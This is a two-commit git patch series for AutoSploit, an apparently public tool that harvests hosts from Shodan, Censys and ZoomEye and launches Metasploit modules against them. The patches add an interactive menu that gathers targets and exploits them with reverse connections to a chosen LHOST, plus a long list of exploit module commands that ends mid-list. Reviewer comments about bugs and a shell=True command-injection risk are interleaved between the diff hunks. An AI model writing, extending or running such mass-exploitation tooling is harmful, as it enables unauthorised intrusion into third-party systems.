From 38e732988f1e4d6c0aa785926a5c8ab0f53fae55 Mon Sep 17 00:00:00 2001
From: ekultek
Date: Mon, 26 Feb 2018 18:49:39 -0600
Subject: [PATCH 1/2] created a terminal output for the program that implements #64 and #49
---
etc/{ => text_files}/general | 0
lib/exploitation/__init__.py | 0
lib/exploitation/exploiter.py | 0
lib/term/__init__.py | 0
lib/term/terminal.py | 288 ++++++++++++++++++++++++++++++++++
5 files changed, 288 insertions(+)
rename etc/{ => text_files}/general (100%)
create mode 100644 lib/exploitation/__init__.py
create mode 100644 lib/exploitation/exploiter.py
create mode 100644 lib/term/__init__.py
create mode 100644 lib/term/terminal.py
diff --git a/etc/general b/etc/text_files/general
similarity index 100%
rename from etc/general
rename to etc/text_files/general
diff --git a/lib/exploitation/__init__.py b/lib/exploitation/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py
new file mode 100644
index 0000000..e69de29
diff --git a/lib/term/__init__.py b/lib/term/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/lib/term/terminal.py b/lib/term/terminal.py
new file mode 100644
index 0000000..a7eb526
--- /dev/null
+++ b/lib/term/terminal.py
@@ -0,0 +1,288 @@ +import os +import sys +# import threading + +import lib.settings +import lib.output +import lib.exploitation.exploiter +import api_calls.shodan +import api_calls.zoomeye +import api_calls.censys + + +stop_animation = False + + +class AutoSploitTerminal(object): + + """ + class object for the main terminal of the program + """ + + def __init__(self, tokens): + self.tokens = tokens + self.usage_path = lib.settings.USAGE_AND_LEGAL_PATH + self.host_path = lib.settings.HOST_FILE + self.sep = "-" * 30 + + def usage_and_legal(self): + """ + shows a display of the output and legal information that resides + in the etc/text_files/general file. + + option 1 must be provided to display + """ + lib.output.info("preparing to display usage and legal") + with open(self.usage_path) as usage: + print(usage.read().strip()) + + def help(self, command): + """ + print the help of the commands + """ + help_dict = { + "usage": self.usage_and_legal, + "view": self.view_gathered_hosts, + "single": self.add_single_host, + "exit": self.quit, + "gather": self.gather_hosts, + "exploit": self.exploit_gathered_hosts, + "custom": self.custom_host_list + } + for key in help_dict.keys(): + if command == key: + lib.output.info("help found for provided argument:") + print(self.sep) + print(help_dict[key].__doc__) + print(self.sep) + break + else: + lib.output.warning("unable to find help for provided command '{}'".format(command)) + lib.output.info("available helps '{}'".format( + ", ".join([k for k in help_dict.keys()]) + )) + + def view_gathered_hosts(self): + """ + print a list of all available hosts in the hosts.txt file + + option 5 must be provided + """ + lib.output.info("loading gathered hosts from {}".format(self.host_path)) + with open(self.host_path) as hosts: + for host in hosts.readlines(): + lib.output.info(host.strip()) + + def add_single_host(self): + """ + add a singluar host to the hosts.txt file and check if the host + will resolve to a true IP address, if it is 
not a true IP address + you will be re-prompted for an IP address + + option 4 must be provided + """ + provided = False + while not provided: + new_host = lib.output.prompt("enter the host IP you wish to add", lowercase=False) + if not lib.settings.validate_ip_addr(new_host): + lib.output.warning("provided host does not appear to be a true IP, try again") + else: + with open(self.host_path, "a+") as hosts: + hosts.write(new_host + os.linesep) + lib.output.info("successfully wrote provided host to {}".format(self.host_path)) + break + + def quit(self, status): + """ + quits the terminal and exits the program entirely + + option 99 must be provided + """ + lib.output.error("aborting terminal session") + assert isinstance(status, int) + sys.exit(status) + + def gather_hosts(self, query, given_choice=None): + """ + gather hosts from either Shodan, Zoomeye, Censys, or multiple + by providing a comma between integers. + + option 2 must be provided + """ + global stop_animation + + choice_dict = { + 1: api_calls.shodan.ShodanAPIHook, + 2: api_calls.zoomeye.ZoomEyeAPIHook, + 3: api_calls.censys.CensysAPIHook + } + searching = False + if given_choice is None: + lib.output.info("please choose an API to gather from (choosing two " + "separate by comma IE; 1,2)") + for i, api in enumerate(lib.settings.API_URLS.keys(), start=1): + print("{}. 
{}".format(i, api.title())) + choice = raw_input(lib.settings.AUTOSPLOIT_PROMPT) + else: + choice = given_choice + while not searching: + try: + choice = int(choice) + # t = threading.Thread( + # target=lib.settings.animation, + # args=("performing lookup for provided query '{}'".format(query),) + # ) + # t.daemon = True + # t.start() + if choice == 1: + choice_dict[choice](self.tokens["shodan"][0], query).shodan() + # stop_animation = True + break + elif choice == 2: + choice_dict[choice](query).zoomeye() + # stop_animation = True + break + elif choice == 3: + choice_dict[choice](self.tokens["censys"][1], self.tokens["censys"][0], query).censys() + # stop_animation = True + break + else: + lib.output.warning("invalid option provided") + except (ValueError, KeyError): + if "," in choice: + for i in choice.split(","): + if int(i) in choice_dict.keys(): + self.gather_hosts(query, given_choice=int(i)) + else: + lib.output.warning("invalid option, skipping") + break + break + else: + lib.output.warning("must be integer between 1-{} not string".format(len(lib.settings.API_URLS.keys()))) + self.gather_hosts(query) + + def exploit_gathered_hosts(self, loaded_mods, hosts=None): + """ + exploit already gathered hosts from the hosts.txt file + + option 6 must be provided + """ + ruby_exec = False + msf_path = None + if hosts is None: + hosts = open(self.host_path).readlines() + if not lib.settings.check_for_msf(): + msf_path = lib.output.prompt( + "it appears that MSF is not in your PATH, provide the full path to it" + ) + ruby_exec = True + lib.output.info( + "you will need to do some configuration to MSF.\n" + "please keep in mind that sending connections back to " + "your local host is probably not a smart idea." 
+ ) + configuration = ( + lib.output.prompt("enter your workspace name", lowercase=False), + lib.output.prompt("enter your LHOST", lowercase=False), + lib.output.prompt("enter your LPORT", lowercase=False) + ) + exploiter = lib.exploitation.exploiter.AutoSploitExploiter( + open(lib.settings.HOST_FILE).readlines(), + configuration, + loaded_mods, + ruby_exec=ruby_exec, + msf_path=msf_path + ) + sorted_mods = exploiter.sort_modules_by_query() + choice = lib.output.prompt( + "a total of {} modules have been sorted by relevance, would you like to display them[y/N]".format( + len(sorted_mods) + ) + ) + if not choice.lower().strip().startswith("y"): + mods = lib.output.prompt("use relevant modules[y/N]") + if mods.lower().startswith("n"): + lib.output.info("starting exploitation with all loaded modules (total of {})".format(len(loaded_mods))) + exploiter.start_exploit(loaded_mods, hosts) + elif mods.lower().startswith("y"): + lib.output.info("starting exploitation with sorted modules (total of {})".format(len(sorted_mods))) + exploiter.start_exploit(sorted_mods, hosts) + else: + exploiter.view_sorted() + mods = lib.output.prompt("use relevant modules[y/N]") + if mods.lower().startswith("n"): + lib.output.info("starting exploitation with all loaded modules (total of {})".format(len(loaded_mods))) + exploiter.start_exploit(loaded_mods, hosts) + elif mods.lower().startswith("y"): + lib.output.info("starting exploitation with sorted modules (total of {})".format(len(sorted_mods))) + exploiter.start_exploit(sorted_mods, hosts) + + def custom_host_list(self, mods): + """ + provided a custom host list that will be used for exploitation + + option 3 must be provided + """ + provided_host_file = lib.output.prompt("enter the full path to your host file", lowercase=False) + self.exploit_gathered_hosts(mods, hosts=provided_host_file) + + def terminal_main_display(self, loaded_mods): + """ + main output of the terminal + """ + lib.output.info("welcome to AutoSploit, choose an option, 
type 99 to quit") + selected = False + + try: + while not selected: + for i in lib.settings.AUTOSPLOIT_TERM_OPTS.keys(): + print("{}. {}".format(i, lib.settings.AUTOSPLOIT_TERM_OPTS[i].title())) + choice = raw_input(lib.settings.AUTOSPLOIT_PROMPT) + try: + choice = int(choice) + if choice == 99: + print(self.sep) + self.quit(0) + print(self.sep) + elif choice == 6: + print(self.sep) + self.exploit_gathered_hosts(loaded_mods) + print(self.sep) + elif choice == 5: + print(self.sep) + self.view_gathered_hosts() + print(self.sep) + elif choice == 4: + print(self.sep) + self.add_single_host() + print(self.sep) + elif choice == 3: + print(self.sep) + self.custom_host_list(loaded_mods) + print(self.sep) + elif choice == 2: + print(self.sep) + query = lib.output.prompt("enter your search query", lowercase=False) + self.gather_hosts(query) + print(self.sep) + elif choice == 1: + print(self.sep) + self.usage_and_legal() + else: + lib.output.warning("invalid option provided") + except ValueError: + if not choice == "help": + if "help" in choice: + try: + help_arg = choice.split(" ") + self.help(help_arg[-1]) + except: + lib.output.error("choice must be integer not string") + else: + lib.output.warning("option must be integer not string") + elif choice == "help": + lib.output.error("must provide an argument for help IE 'help exploit'") + + except KeyboardInterrupt: + print("\n") + self.terminal_main_display(loaded_mods) \ No newline at end of file From afc6567666ff30ff004c70726f8b57093dc8fa66 Mon Sep 17 00:00:00 2001 
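Review bot: `custom_host_list` forwards the path typed at the prompt as `hosts=provided_host_file`, so `exploit_gathered_hosts` receives a string rather than a list of host lines, while the `AutoSploitExploiter` constructor is still given `open(lib.settings.HOST_FILE).readlines()`; entries from the custom file are never read or passed through `lib.settings.validate_ip_addr` the way `add_single_host` does. Read the file in a `with` block, keep only the lines that pass `validate_ip_addr`, and hand that one list to both the constructor and `start_exploit`. In `gather_hosts`, a `KeyError` (for example from `self.tokens["shodan"]`) is caught after `choice` has already become an int, so `if "," in choice` raises `TypeError`; handle the two exceptions separately. `quit` should replace `assert isinstance(status, int)` with an explicit check, since asserts are stripped under `-O`, and in `terminal_main_display` the bare `except:` hides real errors while the recursive `self.terminal_main_display(loaded_mods)` on `KeyboardInterrupt` adds a stack frame on every Ctrl-C.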
From: ekultek Date: Mon, 26 Feb 2018 18:51:27 -0600 Subject: [PATCH 2/2] moved some stuff to settings, created a class for the exploitation so it is easier to mess with, edited the modules and removed -j and use #54, added new args to the available options, edited the api's by adding a description of what is happening at the time of the execution, a couple edits to autosploit.py --- api_calls/censys.py | 6 +- api_calls/shodan.py | 6 +- api_calls/zoomeye.py | 6 +- autosploit.py | 84 +---- etc/json/default_modules.json | 570 +++++++++++++++++----------------- lib/cmdline/cmd.py | 4 + lib/exploitation/exploiter.py | 42 +++ lib/settings.py | 81 ++++- 8 files changed, 425 insertions(+), 374 deletions(-) diff --git a/api_calls/censys.py b/api_calls/censys.py index 7a73b35..edf8128 100644 --- a/api_calls/censys.py +++ b/api_calls/censys.py @@ -1,7 +1,10 @@ import requests from lib.errors import AutoSploitAPIConnectionError -from lib.output import error +from lib.output import ( + error, + info +) from lib.settings import ( HOST_FILE, API_URLS, @@ -25,6 +28,7 @@ def censys(self): """ connect to the Censys API and pull all IP addresses from the provided query """ + info("searching Censys with given query '{}'".format(self.query)) discovered_censys_hosts = set() try: req = requests.post(API_URLS["censys"], auth=(self.id, self.token), json={"query": self.query}) diff --git a/api_calls/shodan.py b/api_calls/shodan.py index f7277fa..0736cfc 100644 --- a/api_calls/shodan.py +++ b/api_calls/shodan.py @@ -3,7 +3,10 @@ import requests from lib.errors import AutoSploitAPIConnectionError -from lib.output import error +from lib.output import ( + error, + info +) from lib.settings import ( API_URLS, HOST_FILE, 
@@ -27,6 +30,7 @@ def shodan(self): """ connect to the API and grab all IP addresses associated with the provided query """ + info("searching Shodan with given query '{}'".format(self.query)) discovered_shodan_hosts = set() try: req = requests.get(API_URLS["shodan"].format(query=self.query, token=self.token)) diff --git a/api_calls/zoomeye.py b/api_calls/zoomeye.py index 2ddb3e1..cb9dab2 100644 --- a/api_calls/zoomeye.py +++ b/api_calls/zoomeye.py @@ -5,7 +5,10 @@ import requests from lib.errors import AutoSploitAPIConnectionError -from lib.output import error +from lib.output import ( + error, + info +) from lib.settings import ( API_URLS, HOST_FILE, @@ -56,6 +59,7 @@ def zoomeye(self): connect to the API and pull all the IP addresses that are associated with the given query """ + info("searching ZoomEye with given query '{}'".format(self.query)) discovered_zoomeye_hosts = set() try: token = self.__get_auth() diff --git a/autosploit.py b/autosploit.py index 6871798..9cdd195 100644 --- a/autosploit.py +++ b/autosploit.py @@ -34,10 +34,12 @@ from lib.settings import ( validate_ip_addr, check_services, + cmdline, load_api_keys, PLATFORM_PROMPT, AUTOSPLOIT_PROMPT, - AUTOSPLOIT_TERM_OPTS + AUTOSPLOIT_TERM_OPTS, + USAGE_AND_LEGAL_PATH ) from lib.output import ( info, @@ -55,7 +57,6 @@ local_host = "" configured = False toolbar_width = 60 -usage_and_legal_path = "{}/etc/general".format(os.getcwd()) loaded_exploits = load_exploits("{}/etc/json".format(os.getcwd())) stop_animation = False 
@@ -91,32 +92,12 @@ def animation(text): def usage(): """Usage & Legal.""" - global usage_and_legal_path print("\033[H\033[J") # Clear terminal logo() - with open(usage_and_legal_path) as info: + with open(USAGE_AND_LEGAL_PATH) as info: print(info.read()) -def cmdline(command): - """ - Function that allows us to store system command output in a variable. - We'll change this later in order to solve the potential security - risk that arises when passing untrusted input to the shell. - - I intend to have the issue resolved by Version 1.5.0. - """ - - command = shlex.split(command) - - process = subprocess.Popen( - args=command, - stdout=subprocess.PIPE, - shell=True - ) - return process.communicate()[0] - - def exploit(query=None, single=None): """Exploit component""" 
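Review bot: `cmdline` is deleted here and re-imported from `lib.settings` in the first hunk of this file, so the pattern its own docstring flagged, `shlex.split` followed by `subprocess.Popen(args=command, shell=True)`, has presumably moved rather than been fixed; the `lib/settings.py` hunk is not visible here, so this needs confirming. With a list and `shell=True` on POSIX only the first element is run as the shell command, so the relocated helper should call `subprocess.Popen(command, stdout=subprocess.PIPE)` without `shell=True`. In `usage()`, `with open(USAGE_AND_LEGAL_PATH) as info:` shadows the `info` function imported from `lib.output`; rename the handle, e.g. `as usage_file`.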
@@ -557,63 +538,6 @@ def try_shodan(): if __name__ == "__main__": - '''from api_calls import ( - shodan, - censys, - zoomeye - ) - from lib.settings import ( - load_api_keys, - API_URLS, - AUTOSPLOIT_PROMPT - ) - - from lib.output import ( - prompt, - info, - warning - ) - - tokens = load_api_keys() - - possible_apis = API_URLS.keys() - - def get_query(): - query = prompt("enter your search query") - return query - - selected = False - info_msg = "searching {} API with query '{}'" - info("pick a search engine") - for i, api in enumerate(sorted(possible_apis), start=1): - print("{}. {}".format(i, api)) - - while not selected: - choice = raw_input(AUTOSPLOIT_PROMPT) - try: - choice = int(choice) - if choice == 1: - selected = True - query = get_query() - info(info_msg.format("Shodan", query)) - censys.CensysAPIHook(tokens["censys"][1], tokens["censys"][0], query).censys() - elif choice == 2: - selected = True - query = get_query() - info(info_msg.format("Censys", query)) - shodan.ShodanAPIHook(tokens["shodan"][0], query).shodan() - elif choice == 3: - query = get_query() - selected = True - info("ZoomEye token will be loaded automatically") - info(info_msg.format("Zoomeye", query)) - zoomeye.ZoomEyeAPIHook(query).zoomeye() - else: - warning("choice must be between 1-{}".format(len(API_URLS.keys()))) - except: - warning("choice must be integer not string")''' - - logo() if len(sys.argv) > 1: diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json index 91a629e..ca7f102 100644 --- a/etc/json/default_modules.json +++ b/etc/json/default_modules.json 
@@ -1,289 +1,289 @@ { "exploits": [
- "use exploit/windows/firewall/blackice_pam_icq; exploit -j;",
- "use exploit/windows/ftp/ms09_053_ftpd_nlst;exploit -j;",
- "use exploit/windows/http/amlibweb_webquerydll_app;exploit -j;",
- "use exploit/windows/http/ektron_xslt_exec_ws;exploit -j;",
- "use exploit/windows/http/umbraco_upload_aspx;exploit -j;",
- "use exploit/windows/iis/iis_webdav_scstoragepathfromurl;exploit -j;",
- "use exploit/windows/iis/iis_webdav_upload_asp;exploit -j;",
- "use exploit/windows/iis/ms01_023_printer;exploit -j;",
- "use exploit/windows/iis/ms01_026_dbldecode;exploit -j;",
- "use exploit/windows/iis/ms01_033_idq;exploit -j;",
- "use exploit/windows/iis/ms02_018_htr;exploit -j;",
- "use exploit/windows/iis/ms02_065_msadc;exploit -j;",
- "use exploit/windows/iis/ms03_007_ntdll_webdav;exploit -j;",
- "use exploit/windows/iis/msadc;exploit -j;",
- "use exploit/windows/isapi/ms00_094_pbserver;exploit -j;",
- "use exploit/windows/isapi/ms03_022_nsiislog_post;exploit -j;",
- "use exploit/windows/isapi/ms03_051_fp30reg_chunked;exploit -j;",
- "use exploit/windows/isapi/rsa_webagent_redirect;exploit -j;",
- "use exploit/windows/isapi/w3who_query;exploit -j;",
- "use exploit/windows/scada/advantech_webaccess_dashboard_file_upload;exploit -j;",
- "use exploit/windows/ssl/ms04_011_pct;exploit -j;",
- "use exploit/freebsd/http/watchguard_cmd_exec;exploit -j; ",
- "use exploit/linux/http/alienvault_exec;exploit -j; ",
- "use exploit/linux/http/alienvault_sqli_exec;exploit -j; ",
- "use exploit/linux/http/astium_sqli_upload;exploit -j; ",
- "use exploit/linux/http/centreon_sqli_exec;exploit -j; ",
- "use exploit/linux/http/centreon_useralias_exec;exploit -j; ",
- "use exploit/linux/http/crypttech_cryptolog_login_exec;exploit -j; ",
- "use exploit/linux/http/dolibarr_cmd_exec;exploit -j; ",
- "use exploit/linux/http/goautodial_3_rce_command_injection;exploit -j;",
- "use exploit/linux/http/kloxo_sqli;exploit -j; ",
- "use exploit/linux/http/nagios_xi_chained_rce;exploit -j; ",
- "use exploit/linux/http/netgear_wnr2000_rce;exploit -j; ",
- "use exploit/linux/http/pandora_fms_sqli;exploit -j; ",
- "use exploit/linux/http/riverbed_netprofiler_netexpress_exe;exploit -j; ",
- "use exploit/linux/http/wd_mycloud_multiupload_upload;exploit -j; ",
- "use exploit/linux/http/zabbix_sqli;exploit -j; ",
- "use exploit/linux/misc/qnap_transcode_server;exploit -j; ",
- "use exploit/linux/mysql/mysql_yassl_getname;exploit -j; ",
- "use exploit/linux/mysql/mysql_yassl_hello;exploit -j; ",
- "use exploit/linux/postgres/postgres_payload;exploit -j; ",
- "use exploit/linux/samba/is_known_pipename;exploit -j; ",
- "use exploit/multi/browser/java_jre17_driver_manager;exploit -j; ",
- "use exploit/multi/http/atutor_sqli;exploit -j; ",
- "use exploit/multi/http/dexter_casinoloader_exec;exploit -j; ",
- "use exploit/multi/http/drupal_drupageddon;exploit -j; ",
- "use exploit/multi/http/manage_engine_dc_pmp_sqli;exploit -j; ",
- "use exploit/multi/http/manageengine_search_sqli;exploit -j; ",
- "use exploit/multi/http/movabletype_upgrade_exec;exploit -j; ",
- "use exploit/multi/http/php_volunteer_upload_exe;exploit -j; ",
- "use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli;exploit -j; ",
- "use exploit/multi/http/splunk_mappy_exec;exploit -j; ",
- "use exploit/multi/http/testlink_upload_exec;exploit -j; ",
- "use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j; ",
- "use exploit/multi/misc/legend_bot_exec;exploit -j; ",
- "use exploit/multi/mysql/mysql_udf_payload;exploit -j; ",
- "use exploit/multi/postgres/postgres_createlang;exploit -j; ",
- "use exploit/solaris/sunrpc/ypupdated_exec;exploit -j; ",
- "use exploit/unix/ftp/proftpd_133c_backdoor;exploit -j; ",
- "use exploit/unix/http/tnftp_savefile;exploit -j; ",
- "use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j; ",
- "use exploit/unix/webapp/kimai_sqli;exploit -j; ",
- "use exploit/unix/webapp/openemr_sqli_privesc_upload;exploit -j; ",
- "use exploit/unix/webapp/seportal_sqli_exec;exploit -j; ",
- "use exploit/unix/webapp/vbulletin_vote_sqli_exec;exploit -j; ",
- "use exploit/unix/webapp/vicidial_manager_send_cmd_exec;exploit -j;",
- "use exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit -j; ",
- "use exploit/windows/http/apache_mod_rewrite_ldap;exploit -j; ",
- "use exploit/windows/http/ca_totaldefense_regeneratereports;exploit -j;",
- "use exploit/windows/http/cyclope_ess_sqli;exploit -j;",
- "use exploit/windows/http/hp_mpa_job_acct;exploit -j;",
- "use exploit/windows/http/solarwinds_storage_manager_sql;exploit -j;",
- "use exploit/windows/http/sonicwall_scrutinizer_sql;exploit -j;",
- "use exploit/windows/misc/altiris_ds_sqli;exploit -j; ",
- "use exploit/windows/misc/fb_cnct_group;exploit -j; ",
- "use exploit/windows/misc/lianja_db_net;exploit -j; ",
- "use exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit -j; ",
- "use exploit/windows/mssql/lyris_listmanager_weak_pass;exploit -j; ",
- "use exploit/windows/mssql/ms02_039_slammer;exploit -j; ",
- "use exploit/windows/mssql/ms09_004_sp_replwritetovarbin;exploit -j; ",
- "use exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli;exploit -j; ",
- "use exploit/windows/mssql/mssql_linkcrawler;exploit -j; ",
- "use exploit/windows/mssql/mssql_payload;exploit -j; ",
- "use exploit/windows/mssql/mssql_payload_sqli;exploit -j; ",
- "use exploit/windows/mysql/mysql_mof;exploit -j; ",
- "use exploit/windows/mysql/mysql_start_up;exploit -j; ",
- "use exploit/windows/mysql/mysql_yassl_hello;exploit -j;",
- "use exploit/windows/mysql/scrutinizer_upload_exec;exploit -j; ",
- "use exploit/windows/postgres/postgres_payload;exploit -j; ",
- "use exploit/windows/scada/realwin_on_fcs_login;exploit -j;",
- "use exploit/multi/http/rails_actionpack_inline_exec;exploit -j;",
- "use exploit/multi/http/rails_dynamic_render_code_exec;exploit -j;",
- "use exploit/multi/http/rails_json_yaml_code_exec;exploit -j;",
- "use exploit/multi/http/rails_secret_deserialization;exploit -j;",
- "use exploit/multi/http/rails_web_console_v2_code_exec;exploit -j;",
- "use exploit/multi/http/rails_xml_yaml_code_exec;exploit -j;",
- "use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j;",
- "use exploit/multi/http/phpmoadmin_exec;exploit -j;",
- "use exploit/multi/http/phpmyadmin_3522_backdoor;exploit -j;",
- "use exploit/multi/http/phpmyadmin_preg_replace;exploit -j;",
- "use exploit/multi/http/phpscheduleit_start_date;exploit -j;",
- "use exploit/multi/http/phptax_exec;exploit -j;",
- "use exploit/multi/http/phpwiki_ploticus_exec;exploit -j;",
- "use exploit/multi/http/plone_popen2;exploit -j;",
- "use exploit/multi/http/pmwiki_pagelist;exploit -j;",
- "use exploit/multi/http/joomla_http_header_rce;exploit -j;",
- "use exploit/multi/http/novell_servicedesk_rce;exploit -j;",
- "use exploit/multi/http/oracle_reports_rce;exploit -j;",
- "use exploit/multi/http/php_utility_belt_rce;exploit -j;",
- "use exploit/multi/http/phpfilemanager_rce;exploit -j;",
- "use exploit/multi/http/processmaker_exec;exploit -j;",
- "use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j;",
- "use exploit/multi/http/spree_search_exec;exploit -j;",
- "use exploit/multi/http/spree_searchlogic_exec;exploit -j;",
- "use exploit/multi/http/struts_code_exec_parameters;exploit -j;",
- "use exploit/multi/http/vtiger_install_rce;exploit -j;",
- "use exploit/multi/http/werkzeug_debug_rce;exploit -j;",
- "use exploit/multi/http/zemra_panel_rce;exploit -j;",
- "use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j;",
- "use exploit/multi/http/joomla_http_header_rce;exploit -j;",
- "use exploit/unix/webapp/joomla_akeeba_unserialize;exploit -j;",
- "use exploit/unix/webapp/joomla_comjce_imgmanager;exploit -j;",
- "use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j;",
- "use exploit/unix/webapp/joomla_media_upload_exec;exploit -j;",
- "use exploit/multi/http/builderengine_upload_exec;exploit -j;",
- "use exploit/multi/http/caidao_php_backdoor_exec;exploit -j;",
- "use exploit/multi/http/atutor_sqli;exploit -j; ",
- "use exploit/multi/http/ajaxplorer_checkinstall_exec;exploit -j;",
- "use exploit/multi/http/apache_activemq_upload_jsp;exploit -j; ",
- "use exploit/unix/webapp/wp_lastpost_exec;exploit -j; ",
- "use exploit/unix/webapp/wp_mobile_detector_upload_execute;exploit -j;",
- "use exploit/multi/http/axis2_deployer;exploit -j;",
- "use exploit/unix/webapp/wp_foxypress_upload;exploit -j;",
- "use exploit/linux/http/tr064_ntpserver_cmdinject;exploit -j;",
- "use exploit/linux/misc/quest_pmmasterd_bof;exploit -j;",
- "use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload;exploit -j;",
- "use exploit/unix/webapp/php_xmlrpc_eval;exploit -j;",
- "use exploit/unix/webapp/wp_admin_shell_upload;exploit -j;",
- "use exploit/linux/http/sophos_wpa_sblistpack_exec;exploit -j;",
- "use exploit/linux/local/sophos_wpa_clear_keys;exploit -j;",
- "use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j;",
- "use auxiliary/admin/cisco/cisco_asa_extrabacon;exploit -j;",
- "use auxiliary/admin/cisco/cisco_secure_acs_bypass;exploit -j;",
- "use auxiliary/admin/cisco/vpn_3000_ftp_bypass;exploit -j;",
- "use exploit/bsdi/softcart/mercantec_softcart;exploit -j; ",
- "use exploit/freebsd/misc/citrix_netscaler_soap_bof;exploit -j;",
- "use exploit/freebsd/samba/trans2open;exploit -j;",
- "use exploit/linux/ftp/proftp_sreplace;exploit -j; ",
- "use exploit/linux/http/dcos_marathon;exploit -j;",
- "use exploit/linux/http/f5_icall_cmd;exploit -j;",
- "use exploit/linux/http/fritzbox_echo_exec;exploit -j;",
- "use exploit/linux/http/gitlist_exec;exploit -j;",
- "use exploit/linux/http/goautodial_3_rce_command_injection;exploit -j;",
- "use exploit/linux/http/ipfire_bashbug_exec;exploit -j;",
- "use exploit/linux/http/ipfire_oinkcode_exec;exploit -j;",
- "use exploit/linux/http/ipfire_proxy_exec;exploit -j;",
- "use exploit/linux/http/kaltura_unserialize_rce;exploit -j;",
- "use exploit/linux/http/lifesize_uvc_ping_rce;exploit -j;",
- "use exploit/linux/http/nagios_xi_chained_rce;exploit -j;",
- "use exploit/linux/http/netgear_dgn1000_setup_unauth_exec;exploit -j;",
- "use exploit/linux/http/netgear_wnr2000_rce ;exploit -j;",
- "use exploit/linux/http/nuuo_nvrmini_auth_rce;exploit -j;",
- "use exploit/linux/http/nuuo_nvrmini_unauth_rce;exploit -j;",
- "use exploit/linux/http/op5_config_exec;exploit -j;",
- "use exploit/linux/http/pandora_fms_exec;exploit -j;",
- "use exploit/linux/http/pineapple_preconfig_cmdinject;exploit -j;",
- "use exploit/linux/http/seagate_nas_php_exec_noauth;exploit -j;",
- "use exploit/linux/http/symantec_messaging_gateway_exec;exploit -j;",
- "use exploit/linux/http/trendmicro_imsva_widget_exec;exploit -j;",
- "use exploit/linux/http/trueonline_billion_5200w_rce;exploit -j;",
- "use exploit/linux/http/trueonline_p660hn_v1_rce;exploit -j;",
- "use exploit/linux/http/trueonline_p660hn_v2_rce;exploit -j;",
- "use exploit/linux/http/vcms_upload;exploit -j;",
- "use exploit/linux/misc/lprng_format_string;exploit -j;",
- "use exploit/linux/misc/mongod_native_helper;exploit -j;",
- "use exploit/linux/misc/ueb9_bpserverd;exploit -j;",
- "use exploit/linux/mysql/mysql_yassl_getname;exploit -j;",
- "use exploit/linux/pop3/cyrus_pop3d_popsubfolders;exploit -j;",
- "use exploit/linux/postgres/postgres_payload;exploit -j;",
- "use exploit/linux/pptp/poptop_negative_read;exploit -j;",
- "use exploit/linux/proxy/squid_ntlm_authenticate;exploit -j;",
- "use exploit/linux/samba/lsa_transnames_heap;exploit -j;",
- "use exploit/linux/samba/setinfopolicy_heap;exploit -j;",
- "use exploit/linux/samba/trans2open;exploit -j;",
- "use exploit/multi/elasticsearch/script_mvel_rce;exploit -j;",
- "use exploit/multi/elasticsearch/search_groovy_script;exploit -j;",
- "use exploit/multi/http/atutor_sqli;exploit -j;",
- "use exploit/multi/http/axis2_deployer;exploit -j;",
- "use exploit/multi/http/familycms_less_exe;exploit -j;",
- "use exploit/multi/http/freenas_exec_raw;exploit -j;",
- "use exploit/multi/http/gestioip_exec;exploit -j;",
- "use exploit/multi/http/glassfish_deployer;exploit -j;",
- "use exploit/multi/http/glpi_install_rce;exploit -j;",
- "use exploit/multi/http/joomla_http_header_rce;exploit -j; ",
- "use exploit/multi/http/makoserver_cmd_exec;exploit -j;",
- "use exploit/multi/http/novell_servicedesk_rc;exploit -j;",
- "use exploit/multi/http/oracle_reports_rce;exploit -j;",
- "use exploit/multi/http/php_utility_belt_rce;exploit -j;",
- "use exploit/multi/http/phpfilemanager_rce;exploit -j;",
- "use exploit/multi/http/phpmyadmin_3522_backdoor;exploit -j;",
- "use exploit/multi/http/phpwiki_ploticus_exec;exploit -j;",
- "use exploit/multi/http/processmaker_exec;exploit -j;",
- "use exploit/multi/http/rails_actionpack_inline_exec;exploit -j;",
- "use exploit/multi/http/rails_dynamic_render_code_exec;exploit -j;",
- "use exploit/multi/http/rails_secret_deserialization;exploit -j;",
- "use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j;",
- "use exploit/multi/http/simple_backdoors_exec;exploit -j;",
- "use exploit/multi/http/spree_search_exec;exploit -j;",
- "use exploit/multi/http/spree_searchlogic_exec;exploit -j;",
- "use exploit/multi/http/struts2_rest_xstream;exploit -j;",
- "use exploit/multi/http/struts_code_exec;exploit -j;",
- "use exploit/multi/http/struts_code_exec_classloader;exploit -j;",
- "use exploit/multi/http/struts_code_exec_parameters;exploit -j;",
- "use exploit/multi/http/struts_dev_mode;exploit -j;",
- "use exploit/multi/http/sysaid_auth_file_upload;exploit -j;",
- "use exploit/multi/http/tomcat_jsp_upload_bypass;exploit -j;",
- "use exploit/multi/http/vtiger_install_rce;exploit -j;",
- "use exploit/multi/http/werkzeug_debug_rce;exploit -j;",
- "use exploit/multi/http/zemra_panel_rce;exploit -j;",
- "use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j;",
- "use exploit/multi/ids/snort_dce_rpc;exploit -j;",
- "use exploit/multi/misc/batik_svg_java;exploit -j;",
- "use exploit/multi/misc/pbot_exec;exploit -j;",
- "use exploit/multi/misc/veritas_netbackup_cmdexec;exploit -j;",
- "use exploit/multi/mysql/mysql_udf_payload;exploit -j;",
- "use exploit/multi/php/php_unserialize_zval_cookie;exploit -j;",
- "use exploit/unix/http/freepbx_callmenum;exploit -j;",
- "use exploit/unix/http/lifesize_room;exploit -j;",
- "use exploit/unix/http/pfsense_clickjacking;exploit -j;",
- "use exploit/unix/http/pfsense_group_member_exec;exploit -j;",
- "use exploit/unix/http/tnftp_savefile;exploit -j;",
- "use exploit/unix/misc/polycom_hdx_traceroute_exec;exploit -j;",
- "use exploit/unix/webapp/awstats_migrate_exec;exploit -j;",
- "use exploit/unix/webapp/carberp_backdoor_exec;exploit -j;",
